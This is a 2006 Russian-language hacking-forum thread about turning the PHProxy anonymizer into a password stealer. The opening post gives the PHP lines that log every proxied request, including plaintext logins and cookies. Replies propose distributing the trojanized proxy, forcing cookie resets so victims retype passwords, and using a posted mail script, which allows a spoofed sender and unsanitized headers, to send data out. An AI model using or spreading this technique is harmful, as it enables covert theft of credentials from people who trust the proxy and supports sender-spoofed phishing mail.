Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
30.10.2006, 17:38
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705
Репутация:
1403
|
|
Анонимайзер =)
Вообщем буду краток...
Воруем пароли с помощью анонимайзера
Недавно решил написать анонимайзер... Но так и не начал, так как появилась другая идея! Вести лог запросов с моего анонимайзера... Ведь там хрогиться много чего интересного, например Наши куки, да что куки там пароль в открытом виде! =)
Например: Мы зашли на форум античата через скирпт и сразу пошли авторизоваться... При авторизации отправляемый пакет выглядит следующим образом:
PHP код:
POST /login.php HTTP/1.0
Host: forum.antichat.ru:80
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1) Gecko/20061010 Firefox/2.0
Referer: http://forum.antichat.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
vb_login_username=[НАШ_ЛОГИН]&vb_login_password=[НАШ ПАРОЛЬ]&cookieuser=1&do=login&forceredirect=1&vb_login_md5password=
Как видно наш пароль виден! (с)
Поэтому не решил заморачиваться писать его, а просто изменил уже готовый...
Я взял PHProxy 0.4 (Взять его можно тут )
Начал изучать его работу и искал место, где он отправляет пакеты на сервер... Это место я нашел! (Действительно, писал бы я ето, еслиб не нашел?...) =)
В файле PHProxy.class.php на линии 713.
PHP код:
$this->request_headers = $headers;
Тут все данные собираются в одну переменну, т.е. в готовый пакет... Именно этот пакет то нам и нужен...
Осталось тока его сохранять в файл при каждой отправке... Делается это просто:
PHP код:
$this->request_headers = $headers;
$txt = fopen ("log.txt","a");
fputs($txt,$headers."\r\n=================================\r\n");
fclose($txt);
Теперь все пакеты будут отправляться на сервер и одновременно записоваться в лог...
Конечно txt файл не очень удобен, но им и не ограничевается! Можно создать базу данных, куда будут запихиваться пакеты... Для удобства можно, чтобы каждая таблица имела имя хоста а вней уже все пакеты с него... Вообщем простор есть =)
ЗЫ. Сразу скажу, что PHProxy использовал на апаче, причем удачно, на сайты не загружал =)
вы можете использовать любой другой анонимайзер =)
ЗЗЫ. Извиняюсь, если криво оформлено, или подобная статья уже есть... Или если это вообще бред... =)
Думаю и статьей это трудно назвать...
Интересно станите ли вы доверять им после прочтенного?
(с) bul666 |
|
|
30.10.2006, 17:42
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Ну теперь начинай распространять обновлённый аномайзер!
|
|
|
|
30.10.2006, 17:45
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705
Репутация:
1403
|
|
Ну теперь начинай распространять обновлённый аномайзер!
Кстати... Сначала вообще решил написать Antichat's Анонимайзер и поместить в Избранное... =))))
|
|
|
|
30.10.2006, 17:51
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
эххххххх бульба) приболел? во лови и не парься)
mail.php
PHP код:
<?
print("<!-- coded Sn@k3 2006 Ma1l S3nd (c) -->
<meta Content-type: text/plain; charset=windows-1253>
<html>
<head><title>Ma1l S3nD 0.1</title><body background='1010.JPG'></head><hr width='80%' color='#555555'><center><h1>Ma1l S3nD 0.1</h1></center><hr width='80%' color='#555555' />
<form name='Send' method='post' action='mailer.php'>
<input type='text'name='poluchatel' value=''>:poluchatel@mail.ru<br>
<input type='text' name='otpravitel' value=''>:otpravitel@mail.ru or Anton <оtprаvitel@mail.ru><br>
<input type='text' name='subj' value='Превед...'>
<input type='radio' checked='checked' tabindex='1' name='tipe' value='html'>:html <input type='radio' name='tipe' value='plain'>:text
<br>
<textarea name='messaga' rows='4' cols='110' value='Сообщение'></textarea><input type='submit' name='send' value='отправить'>
</form><hr width='100%' color='#f01f1f' /><center><a href='http://Snak3.microsoftt.ru' title='Перейти на главную страницу'>Snak3.microsoftt.ru 2006 (c)</a></center><hr width='100%' color='#f01f1f' />
</html>");
?>
PHP код:
<?
if($poluchatel)
{
if($otpravitel)
{
if($messaga)
{
$to = "$poluchatel" . ", " ;
$subject = "$subj";
$message = $messaga;
$headers = "MIME-Version: 1.0
";
$headers .= "Content-type: text/$tipe; charset=iso-8859-1
";
$headers .= "From: $otpravitel
";
mail($to, $subject, $message, $headers);
echo('<body background="1010.jpg"><center><b><font color="green">Сообщение успешно отправлено</font></b></center><br><center><a href="http://Snak3.microsoftt.ru/mail/index.php">back</a></center>');
}
else
{
echo('<body background="0101.jpg"><center><b><font color="red">Следует ввести текст сообщения!</font></b></center><br><center><a href="http://Snak3.microsoftt.ru/mail/index.php">back</a></center>');
}
}
else
{
echo('<body background="0101.jpg"><center><b><font color="red">Введите отправителя письма, то есть ваш e-mail.</font></b></center><br><center><a href="http://Snak3.microsoftt.ru/mail/index.php">back</a></center>');
}
}
else
{
echo('<body background="0101.jpg"><center><b><font color="red">Необходимо ввести получателя данного письма.</font></b></center><br><center><a href="http://Snak3.microsoftt.ru/mail/index.php">back</a></center>');
}
// Snak3.microsoftt.ru Sn@k3 ICQ 127924
?>
Последний раз редактировалось Sn@k3; 30.10.2006 в 17:53..
Причина: упс ашибочка
|
|
|
|
30.10.2006, 17:53
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705
Репутация:
1403
|
|
2Sn@k3: Ну дык это отправка почты =) Ты это предлогаешь поставить вместо сохранения в файл?
Последний раз редактировалось bul.666; 30.10.2006 в 17:55..
|
|
|
|
30.10.2006, 18:10
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Может тогда ещё юзеру будешь 1 раз куки сбрасывать? Чтобы 100% получать чистые пароли.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
30.10.2006, 18:16
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705
Репутация:
1403
|
|
Чтобы 100% получать чистые пароли.
А так какой процент?
При заходе через анонимайзер на форум, даже если вы до этого были авторизированы там, все равно придется заново проходить авторизацию... =)
|
|
|
|
30.10.2006, 20:22
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
буль хз прочитал тока загаловок)
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
